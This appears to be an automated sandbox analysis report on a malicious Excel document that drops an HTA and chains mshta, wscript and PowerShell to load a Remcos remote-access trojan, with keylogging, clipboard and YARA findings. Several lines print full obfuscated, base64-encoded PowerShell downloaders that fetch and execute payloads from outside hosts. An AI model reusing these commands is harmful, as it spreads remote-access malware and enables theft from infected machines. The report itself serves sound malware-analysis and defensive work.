                  Source: powershell.exe, 00000007.00000002.472448949.00000000123C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000007.00000002.472448949.00000000123C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000007.00000002.472448949.00000000123C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: bhv5265.tmp.29.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                  Source: bhv5265.tmp.29.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                  Source: bhv5265.tmp.29.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                  Source: bhv5265.tmp.29.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhv5265.tmp.29.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: CasPol.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: powershell.exe, 00000007.00000002.472448949.00000000123C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: bhv5265.tmp.29.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                  Source: powershell.exe, 0000000C.00000002.523814321.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.557478401.0000000002340000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                  Source: powershell.exe, 00000017.00000002.557478401.0000000002340000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
                  Source: powershell.exe, 0000000C.00000002.523814321.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.557478401.0000000002340000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX
                  Source: bhv5265.tmp.29.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: mshta.exe, 00000004.00000003.446100049.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446057103.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490334526.0000000000131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487780679.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.0000000000131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.492377174.0000000000131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/
                  Source: mshta.exe, 00000004.00000003.440649981.000000000019F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446412500.000000000019F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446132664.000000000019F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/Dat
                  Source: mshta.exe, 0000000E.00000002.492377174.0000000000131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker
                  Source: mshta.exe, 00000004.00000002.446412500.000000000019F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker/
                  Source: mshta.exe, 0000000E.00000003.490334526.000000000011E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerA
                  Source: mshta.exe, 00000004.00000002.446390710.000000000012A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerI
                  Source: mshta.exe, 0000000E.00000002.492377174.0000000000113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerL
                  Source: mshta.exe, 0000000E.00000003.490334526.000000000011E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.492377174.000000000011F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerO
                  Source: mshta.exe, 0000000E.00000002.492377174.00000000000CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerX
                  Source: 0200011080.xls, CC430000.0.drString found in binary or memory: https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker_
                  Source: mshta.exe, 00000004.00000003.440649981.000000000019F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446412500.000000000019F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446132664.000000000019F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/us
                  Source: bhv5265.tmp.29.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: CasPol.exe, 0000001D.00000002.549016177.0000000002363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: bhv5265.tmp.29.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                  Source: CasPol.exe, CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: CasPol.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhv5265.tmp.29.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                  Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49165 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49167 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49173 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49174 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000032_2_004099E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0041183A OpenClipboard,GetLastError,DeleteFileW,29_2_0041183A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,29_2_0040987A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,29_2_004098E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,30_2_00406DFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,30_2_00406E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,31_2_004068B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,31_2_004072B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,32_2_004159C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,32_2_004159C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,32_2_00409B10
                  Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: Yara matchFile source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3640, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000020.00000002.555858192.0000000000585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3640, type: MEMORYSTR

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Contains functionalty to change the wallpaper
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0041BB77 SystemParametersInfoW,32_2_0041BB77

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3984, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 2112, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: CasPol.exe PID: 3640, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Excel sheet contains many unusual embedded objects
                  Source: 0200011080.xlsOLE: Microsoft Excel 2007+
                  Source: 0200011080.xlsOLE: Microsoft Excel 2007+
                  Source: CC430000.0.drOLE: Microsoft Excel 2007+
                  Source: CC430000.0.drOLE: Microsoft Excel 2007+
                  Microsoft Office drops suspicious files
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingpersonwithhergirlfriendsheisbeautiful[1].htaJump to behavior
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
